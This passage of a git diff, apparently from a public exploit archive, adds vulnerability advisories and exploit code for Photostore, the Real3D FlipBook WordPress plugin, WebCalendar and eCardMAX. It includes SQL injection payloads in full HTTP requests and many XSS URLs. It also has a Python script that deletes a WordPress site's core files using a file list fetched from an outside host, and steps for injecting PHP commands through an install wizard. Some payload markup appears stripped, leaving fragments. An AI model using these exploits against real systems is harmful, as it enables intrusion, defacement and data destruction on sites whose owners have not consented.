vulnerabilities to retrieve all the data stored in the application's database (In case of SQL Injection vulnerability), Cookie Stealing / Phishing attacks (In case of Cross site scripting vulnerability). + + + +# SQL Injection (error based) Proof-Of-Concept +#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-# +# SQL Injection (Severity is Critical) +# The vulnerable parameter is “gallerySortType” which is not sanitized and sent by the user in order retrieve the gallery objects ordered by ASC or DESC in sql query. +# Request Data #1 is: + +POST /photostore/gallery/Objects/24/page1/ HTTP/1.1 +Cache-Control: no-cache +Referer: http://www.example.net/photostore/gallery/Objects/24/page1/ +Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 +User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) +Accept-Language: en-us,en;q=0.5 +Host: www.ktoolsdemos.net +Cookie: PHPSESSID=3eef92499b2e80b0efae88f4d99e5ffe; cart[uniqueOrderID]=F844D7C9C7B2EA3806E501D476D3BF6E; member[umem_id]=C4A01DFEB29A64F53261C12F0F017E90; 09584=eccbc87e4b5ce2fe28308fd9f2a7baf3; pass_4647=eccbc87e4b5ce2fe28308fd9f2a7baf3 +Accept-Encoding: gzip, deflate +Content-Length: 221 +Content-Type: application/x-www-form-urlencoded + +postGalleryForm=1&gallerySortBy=media_id&gallerySortType=asc,[SQL_PAYLOAD] + +# Inserted payload for example: +postGalleryForm=1&gallerySortBy=media_id&gallerySortType=asc,(SELECT 9713 FROM(SELECT COUNT(*),CONCAT(0x71716b6b71,(SELECT (ELT(9713=9713,1))),0x7178717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) + +### +#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-# +### +# The vulnerable parameter is “gallerySortBy” which is not sanitized and sent by the user in order retrieve the gallery objects selected by kind-of-type in sql query. +# Request Data #2 is: + +POST /photostore/gallery/Objects/24/page1/ HTTP/1.1 +Cache-Control: no-cache +Referer: http://server/photostore/gallery/Objects/24/page1/ +Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 +User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) +Accept-Language: en-us,en;q=0.5 +Host: server +Cookie: PHPSESSID=3eef92499b2e80b0efae88f4d99e5ffe; cart[uniqueOrderID]=F844D7C9C7B2EA3806E501D476D3BF6E; member[umem_id]=C4A01DFEB29A64F53261C12F0F017E90; 09584=eccbc87e4b5ce2fe28308fd9f2a7baf3; pass_4647=eccbc87e4b5ce2fe28308fd9f2a7baf3 +Accept-Encoding: gzip, deflate +Content-Length: 57 +Content-Type: application/x-www-form-urlencoded + +postGalleryForm=1&gallerySortBy=id[SQL_PAYLOAD]&gallerySortType=asc + +# Inserted payload for example: +postGalleryForm=1&gallerySortBy=id AND (SELECT 7522 FROM(SELECT COUNT(*),CONCAT(0x7176787871,(SELECT (ELT(7522=7522,1))),0x716a717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&gallerySortType=asc + + + +# Cross Site Scripting Proof—Of-Concept +#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-# +# XSS (Severity is Medium) +# The vulnerable parameter is “mediaID” in “workbox.php” file and the parameter “password” in “/mgr.login.php” file which is not sanitized and sent by the user to the application +# +# In Order to exploit this vulnerability, the URL should be like the following examples: +# +# http://server/photostore/workbox.php?mode=addToLightbox&mediaID=“> +# http://server/photostore/manager/mgr.login.php?username=demo&password='>alert(/makman/)'} + imageUrl = 'http://makman.tk/makman.jpg' + wpFilesUrl = 'http://makman.tk/wpFiles.json' + + def __init__(self, url): + url = url.rstrip('/') + if 'http://' in url or 'https://' in url: + self.url = url + else: + self.url = 'http://' + url + + def http(self, url, data = {}, post = False): + try: + if post: + r = requests.post(url, data = data, headers = self.headers, timeout = 20) + else: + r = requests.get(url, params = data, headers = self.headers, timeout = 20) + except: + exit('[-] Something went wrong. Please check your internet connection') + return r + + def deleteFiles(self): + print('[+] Loading Wordpress file structure') + r = self.http(self.wpFilesUrl) + wpFiles = json.loads(r.text) + print('[+] Wordpress File structure loaded successfully') + print('[+] Creating directory real3dflipbook') + r = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/process.php', {'imgbase' : 'makman'}, True) + print('[+] Deleting Files from wp-includes/ & wp-admin/') + for wpFile in wpFiles['wpFiles']: + print(' [+] Deleting File ' + wpFile) + self.payload1['deleteBook'] = wpFile + r = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/process.php', self.payload1, True) + print('[+] Files have been deleted successfully') + + def uploadImage(self): + print('[+] Loading image file') + r = self.http('http://makman.tk/makman.jpg') + encodedImage = base64.b64encode(r.content) + self.payload2['imgbase'] = ';,' + encodedImage.decode('utf-8') + print('[+] Uploading image file in target root directory') + r = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/process.php', self.payload2, True) + print('[+] Image has been uploaded here ' + self.url + '/' + self.payload2['pageName'] + '.jpg') + + def xss(self): + print('[+] Checking XSS payload') + r = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/flipbooks.php', self.payload3) + if self.payload3['bookId'] in r.text: + print('[+] Found XSS here :') + print(' [+] ' + self.url + '/wp-content/plugins/real3d-flipbook/includes/flipbooks.php?action=' + self.payload3['action'] + '&bookId=' + self.payload3['bookId']) + +######################################################################################################### + +def banner(): + os.system('cls' if os.name == 'nt' else 'clear') + tabs = ' ' + print(tabs + '*******************************************************************') + print(tabs + '* [+] [POC][Exploit] CodeCanyon Real3D FlipBook WordPress Plugin *') + print(tabs + '* [+] Multiple Vulnerabilities Found by: *') + print(tabs + '* [+] https://mukarramkhalid.com *') + print(tabs + '*******************************************************************\n\n') + +def main(): + banner() + url = input('[+] Enter Url\n[+] E.g. http://server or http://server/wordpress\n[+] ') + exploit = wpFlipbook(url) + exploit.deleteFiles() + exploit.uploadImage() + exploit.xss() + print('[+] Done') + +if __name__ == '__main__': + try: + main() + except KeyboardInterrupt: + exit('\n[-] CTRL-C detected.\n') +# End \ No newline at end of file diff --git a/platforms/php/webapps/40057.txt b/platforms/php/webapps/40057.txt new file mode 100755 index 000000000..406c391be --- /dev/null +++ b/platforms/php/webapps/40057.txt @@ -0,0 +1,269 @@ +[+] Credits: John Page aka HYP3RLINX + +[+] Website: hyp3rlinx.altervista.org + +[+] Source: +http://hyp3rlinx.altervista.org/advisories/WEBCALENDAR-V1.2.7-CSRF-PROTECTION-BYPASS.txt + +[+] ISR: ApparitionSec + + + +Vendor: +========================== +www.k5n.us/webcalendar.php + + + +Product: +================== +WebCalendar v1.2.7 + +WebCalendar is a PHP-based calendar application that can be configured as a +single-user calendar, a multi-user calendar for groups of users, or as an +event calendar viewable by visitors. MySQL, PostgreSQL, Oracle, DB2, +Interbase, MS SQL Server, or ODBC is required. + +WebCalendar can be setup in a variety of ways, such as... + +A schedule management system for a single person +A schedule management system for a group of people, allowing one or more +assistants to manage the calendar of another user +An events schedule that anyone can view, allowing visitors to submit new +events +A calendar server that can be viewed with iCalendar-compliant calendar +applications like Mozilla Sunbird, Apple iCal or GNOME Evolution or +RSS-enabled +applications like Firefox, Thunderbird, RSSOwl, FeedDemon, or BlogExpress. + + + + +Vulnerability Type: +====================== +CSRF PROTECTION BYPASS + + + +CVE Reference: +============== +N/A + + + +Vulnerability Details: +===================== + +WebCalendar attempts to uses the HTTP Referer to check that requests are +originating from same server as we see below. + +From WebCalendar "include/functions.php" file on line 6117: + +//////////////////////////////////////////////////////////// + +function require_valide_referring_url () +{ + + global $SERVER_URL; + + +if ( empty( $_SERVER['HTTP_REFERER'] ) ) { + + // Missing the REFERER value + + //die_miserable_death ( translate ( 'Invalid referring URL' ) ); + + // Unfortunately, some version of MSIE do not send this info. + + return true; + } + +if ( ! preg_match ( "@$SERVER_URL@i", $_SERVER['HTTP_REFERER'] ) ) { + + // Gotcha. URL of referring page is not the same as our server. + +// This can be an instance of XSRF. + +// (This may also happen when more than address is used for your server. + +// However, you're not supposed to do that with this version of + +// WebCalendar anyhow...) + die_miserable_death ( translate ( 'Invalid referring URL' ) ); + + } + +} + +///////////////////////////////////////////////////////////////////////////////////////// + +However, this can be easily defeated by just not sending a referer. HTML 5 +includes a handy tag to omit the +referer +when making an HTTP request, currently supported in Chrome, Safari, +MobileSafari and other WebKit-based browsers. Using this meta tag we send +no referrer +and the vulnerable application will then happily process our CSRF requests. + + + +Exploit code(s): +=============== + +1) CSRF Protection Bypass to change Admin password POC. Note: Name of the +victim user is required for success. + + + + +
+ + + + +
+ + +2) CSRF Protection Bypass modify access controls under "System Settings" / +"Allow public access" + + + +

+ + + + +
+ + +####################################################### + +Vulnerability Type: +====================== +PHP Code Injection + + + +CVE Reference: +============== +N/A + + + +Vulnerability Details: +===================== + +Since WebCalendars install script is not removed after installation as +there is no "automatic" removal of it, low privileged users can inject +arbitrary +PHP code for the "Database Cache" directory value as no input validation +exists for this when a user installs the application using the WebCalendar +walk +thru wizard. + +If WebCalendars installation script is available as part of a default +image, often as a convenience by some hosting providers, this can be used +to gain +code execution on the target system. The only item that is required is the +user must have privileges to authenticate to the MySQL Database and to run +the +install script. So, users who have install wizard access for the +WebCalendar application will now have ability to launch arbitrary system +commands on the +affected host. + +One problem we must overcome is WebCalendar filters quotes " so we cannot +use code like However, we can defeat +this +obstacle using the all to forgotten backtick `CMD` operator!. + +e.g. + +*/?> + +This results in "settings.php" being injected like... + + +readonly: false +user_inc: user.php +use_http_auth: false +single_user: false +# end settings.php */ +?> + + + +Exploitation steps(s): +===================== + +1) Login to the WebCalendar Installation Wizard. + +2) When you get to WebCalendar Installation Wizard Step 2 of the install +script. +http://localhost/WebCalendar-1.2.7/WebCalendar-1.2.7/install/index.php?action=switch&page=2 + +3) Click "Test Settings" button to ensure connection to the Database. +4) Enter below PHP code for the "Database Cache Directory:" input fields +value to pop calculator for POC (Windows). + +*/?> + +5) Click "Next" button +6) Click "Next" button +7) Click "Save settings" button + +BOOOOOOOM! "settings.php" gets overwritten and injected with our PHP code. + +If you happen to get following error when clicking "Test Settings" button, +"Failure Reason: Database Cache Directory does not exist", just click back +button then forward or just "Test settings" button again to try get past +the error. + + +Disclosure Timeline: +=============================== +Vendor Notification: No replies +July 4, 2016 : Public Disclosure + + + + +Exploitation Technique: +======================= +Remote + + + +Severity Level: +================ +6.8 (Medium) +CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no +warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, +provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in +vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the +information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author +prohibits any malicious use of security related information +or exploits by the author or elsewhere. + +HYP3RLINX diff --git a/platforms/php/webapps/40058.txt b/platforms/php/webapps/40058.txt new file mode 100755 index 000000000..30405c510 --- /dev/null +++ b/platforms/php/webapps/40058.txt @@ -0,0 +1,98 @@ +eCardMAX 10.5 SQL Injection and XSS Vulnerabilities + + +[Software] + +- eCardMAX 10.5 + + +[Vendor] + +- eCardMAX.COM - http://www.ecardmax.com/ + + +[Vendor Product Description] + +- eCardMax is the most trusted, powerful and dynamic online ecard software solution. It enables you to create your +own ecard website with many of the advanced features found on other major sites. Starting your own ecard website +with eCardMax is fast and easy. + + +[Advisory Timeline] + +- 13/06/2016 -> Vulnerability discovered; +- 13/06/2016 -> First contact with vendor; +- 13/06/2016 -> Vendor responds asking for details; +- 14/06/2016 -> Vulnerability details sent to the vendor; +- 17/06/2016 -> Vendor working on a patch; +- 28/06/2016 -> Vendor Releases Patch +- 01/07/2016 -> Public Security Advisory Published + + +[Bug Summary] + +- SQL Injection + +- Cross Site Scripting (Reflected) + + +[Impact] + +- High + + +[Affected Version] + +- v10.5 + + +[Tested on] + +- Apache/2.2.26 +- PHP/5.3.28 +- MySQL/5.5.49-cll + + +[Bug Description and Proof of Concept] + +- eCardMAX suffers from a SQL Injection vulnerability. Input passed via the 'row_number' GET parameter is not properly +sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting +arbitrary SQL code. + +- Multiple cross-site scripting vulnerabilities were also discovered. The issue is triggered when input passed via multiple parameters +is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's +browser session in context of an affected site. + + +[Proof-of-Concept] + +1. SQL Injection: + +Parameter: row_number (GET) +POC URL: +http://localhost/ecardmaxdemo/admin/index.php?step=admin_show_keyword&what=&row_number=10%20order%20by%201--&search_year=2016&page=2 + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + +2. Cross Site Scripting (Reflected): + +http://localhost/ecardmaxdemo/admin/index.php?step=admin_member_display&search_field=all&keyword=%3Cscript%3Ealert(1)%3C%2Fscript%3E&cmd_button=Search+User +Parameter(s): keyword (GET) + +http://localhost/ecardmaxdemo/admin/index.php?step=admin_cellphone_carrier&row_number=15&page=14%22%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E +Parameter(s): page (GET) + +http://localhost/ecardmaxdemo/admin/index.php?step=admin_show_keyword&what=&row_number=10%22%3E%3Cscript%3Ealert(1)%3C/script%3E&search_year=2016&page=2 +Parameter(s): row_number (GET) + +http://localhost/ecardmaxdemo/admin/index.php?step=admin_member_display_inactive_account&what=&row_number=15&what2=&cmd_button=%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E&list_item=%3C/script%3E%3Cscript%3Ealert(2)%3C/script%3E&search_field=%3C/script%3E%3Cscript%3Ealert(3)%3C/script%3E&keyword=&num_day=%3C/script%3E%3Cscript%3Ealert(4)%3C/script%3E&num_what=%3C/script%3E%3Cscript%3Ealert(5)%3C/script%3E&from_month=%3C/script%3E%3Cscript%3Ealert(6)%3C/script%3E&from_day=%3C/script%3E%3Cscript%3Ealert(7)%3C/script%3E&from_year=%3C/script%3E%3Cscript%3Ealert(8)%3C/script%3E&to_day=%3C/script%3E%3Cscript%3Ealert(9)%3C/script%3E&to_month=%3C/script%3E%3Cscript%3Ealert(10)%3C/script%3E&to_year=%3C/script%3E%3Cscript%3Ealert(11)%3C/script%3E&page=2%3C/script%3E%3Cscript%3Ealert(12)%3C/script%3E +Parameter(s): cmd_button, list_item, search_field, num_day, num_what, from_month, from_day, from_year, to_day, to_month, to_year, page (GET) + +http://localhost/ecardmaxdemo/admin/index.php?step=admin_member_display&search_field=user_name_id&cmd_button=Search+User&keyword=833981213299707%22%3E%3Cscript%3Ealert(1)%3C/script%3E +Parameter(s): keyword (GET) + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + +All flaws described here were discovered and researched by: + +Bikramaditya Guha aka "PhoenixX" \ No newline at end of file